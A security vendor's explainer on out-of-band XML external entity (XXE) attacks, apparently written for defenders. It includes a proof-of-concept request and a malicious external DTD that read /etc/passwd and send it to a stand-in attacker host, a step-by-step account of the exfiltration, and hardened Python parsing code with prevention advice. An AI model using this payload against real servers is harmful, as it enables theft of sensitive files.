Out-of-band XML external entity (OOB XXE)

What is OOB XXE?

Out-of-band XML external entity (OOB XXE) vulnerabilities are a type of XXE vulnerability where the attacker does not receive an immediate response to the XXE payload. The attack is conducted using one channel, such as a direct HTTP request, while the results (such as sensitive files) are received through another channel – often an HTTP server controlled by the attacker.

OOB XXE is sometimes confused with blind XXE because neither produces a direct response. With blind XXE, however, the attacker receives no data through any channel and instead reconstructs sensitive information step by step from the behavior of the targeted app, such as the web server and XML parser errors it generates.

The process for exploiting out-of-band XXE vulnerabilities is similar to using parameter entities with in-band XXE. The attacker creates an external DTD (document type definition) that the attacked application then downloads from an attacker-controlled HTTP server.

While in-band XXE can be used to conduct denial of service (DoS) and server-side request forgery (SSRF) attacks against web apps and APIs, the primary goal of OOB XXE is sensitive data exfiltration.

Example of OOB XXE

The following is a PoC example of how an attacker could use parameter entities to steal sensitive data using an out-of-band (OOB) technique:

Request:

POST http://example.com/xml HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
  <!ENTITY % file SYSTEM
  "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM
  "http://bad.example.com/evil.dtd">
  %dtd;
]>
<data>&send;</data>

Malicious DTD (bad.example.com/evil.dtd):

<!ENTITY % all "<!ENTITY send SYSTEM 'http://bad.example.com/?collect=%file;'>">
%all;

The attack is conducted as follows:

  1. The XML parser first parses the %file parameter entity, loading the file /etc/passwd.
  2. Next, the XML parser resolves the %dtd parameter entity and makes a request to get the attacker’s DTD file at http://bad.example.com/evil.dtd.
  3. After the parser has processed the attacker’s DTD file, the %all parameter entity creates a general entity called &send that contains a URL. This URL uses the %file parameter entity, which was resolved in step 1 and now holds the content of a local file. In this case, this is the content of the Linux /etc/passwd file.
  4. Finally, after the URL is constructed, the XML parser processes the &send XML entity, thus sending a request to the attacker’s server.
  5. The attacker can log the request on their end and reconstruct the file from the log entry.

Note that this specific attack is not designed to send binary files to the attacker’s server because of URL format limitations. However, you may be able to work around these limitations using techniques such as PHP wrappers to encode the file using Base64.

How to prevent out-of-band XXE vulnerabilities?

The only effective way to prevent malicious hackers from carrying out XXE attacks, both in-band XXE and OOB XXE, is to completely disable the processing of XML external entities in XML content coming from untrusted sources. In addition, OWASP recommends that you completely disable support for processing external document type definitions and require developers to use only static, local DTDs. If your web application has functionality that requires the use of external DTDs, you should at least disable support for external entities in external DTDs. We do not recommend relying on manual validation or sanitization of XML documents before processing as a way to prevent XXE attacks.

To learn how to disable DTD and XXE processing in your specific XML parser, refer to the relevant OWASP XXE prevention cheat sheet, which contains instructions for many commonly used programming languages and XML parsers.
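
As an added illustration of the advice above (example code written for this article, not Invicti's code and not taken from the OWASP cheat sheet), the following uses only the Python standard library to build a parser that refuses DTDs at the parser level rather than by pre-filtering the document. The function and exception names (parse_untrusted_xml, hardened_sax_parser, rejects_dtd, DTDForbidden) and the sample documents, including the placeholder host attacker.invalid, are this example's own constructions.

```python
"""Hardened XML parsing for untrusted input using only the Python standard library.

Added example; not the article's or Invicti's code.  Names and sample documents
below are constructed for illustration.
"""
import xml.parsers.expat as expat
import xml.sax
from xml.sax.handler import feature_external_ges, feature_external_pes


class DTDForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE, an entity declaration,
    or a reference to an external entity."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse XML from an untrusted source with DTD processing disabled.

    Any DOCTYPE (internal or external), any entity declaration and any
    external entity reference aborts parsing with DTDForbidden, so neither a
    local file nor a remotely hosted DTD is ever fetched.  Returns the root
    element name and its character data, enough to see what was accepted.
    """
    parser = expat.ParserCreate()

    # Never read external parameter entities: this is the channel through which
    # an OOB XXE payload pulls in its remote DTD.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    # Expat callback signatures are fixed; each handler simply refuses the construct.
    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed in untrusted XML")

    def forbid_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise DTDForbidden(f"entity declaration {name!r} is not allowed")

    def forbid_external_ref(context, base, sysid, pubid):
        raise DTDForbidden(f"external entity {sysid!r} is not allowed")

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity_decl
    parser.ExternalEntityRefHandler = forbid_external_ref

    result = {"root": None, "text": []}

    def start_element(name, attrs):
        if result["root"] is None:
            result["root"] = name

    def char_data(text):
        result["text"].append(text)

    parser.StartElementHandler = start_element
    parser.CharacterDataHandler = char_data

    parser.Parse(data, True)  # an exception raised inside a handler propagates here
    result["text"] = "".join(result["text"])
    return result


def rejects_dtd(data: bytes) -> bool:
    """True when parse_untrusted_xml refuses the document because of its DTD."""
    try:
        parse_untrusted_xml(data)
    except DTDForbidden:
        return True
    return False


def hardened_sax_parser() -> "xml.sax.xmlreader.XMLReader":
    """Return an xml.sax parser with external general and external parameter
    entities explicitly switched off (the two switches the article refers to)."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    return parser


def external_entities_disabled(parser) -> bool:
    """True when the SAX parser fetches neither external general nor
    external parameter entities."""
    return (not parser.getFeature(feature_external_ges)
            and not parser.getFeature(feature_external_pes))


# Constructed sample documents (not captured traffic).
BENIGN_XML = b'<?xml version="1.0"?><data>hello</data>'

# Same shape as the article's OOB payload, with placeholder paths and hosts.
OOB_STYLE_XML = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE data ['
    b'  <!ENTITY % file SYSTEM "file:///path/to/secret">'
    b'  <!ENTITY % dtd SYSTEM "http://attacker.invalid/evil.dtd">'
    b'  %dtd;'
    b']>'
    b'<data>&send;</data>'
)

if __name__ == "__main__":
    print(parse_untrusted_xml(BENIGN_XML))
    print("OOB-style document rejected:", rejects_dtd(OOB_STYLE_XML))
    print("SAX external entities disabled:", external_entities_disabled(hardened_sax_parser()))
```

The DOCTYPE handler fires before any entity in the internal subset is declared or resolved, so the parser stops at the first byte of the DTD and the external DTD request that the OOB technique depends on never happens. Switching off external parameter entity parsing is kept as a second, independent control for parsers that cannot reject DTDs outright.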

Frequently asked questions

What is OOB XXE?

OOB XXE stands for out-of-band XML external entity. OOB XXE vulnerabilities are a type of XXE vulnerability where the attacker does not receive an immediate response to the XXE payload. The attack is conducted using one channel, like a direct HTTP request, while the results are received through another channel – typically sent to an HTTP server controlled by the attacker.

When is OOB XXE possible?

OOB XXE is possible if the application is vulnerable to XXE and the attacker has a web server that they can use to host malicious DTDs and receive responses. OOB XXE is the preferred attack technique when the attacker has no way to directly receive responses from a vulnerable application, for example, if the content of an uploaded XML document cannot be displayed.

How to prevent OOB XXE?

The best way to prevent OOB XXE vulnerabilities and all other types of XXE vulnerabilities is to completely disable document type definitions (DTDs) in your XML parser. If this is not possible, you should at least disable support for external entities and external document type declarations for your parser.

Written by: Tomasz Andrzej Nidecki, reviewed by: Benjamin Daniel Mussler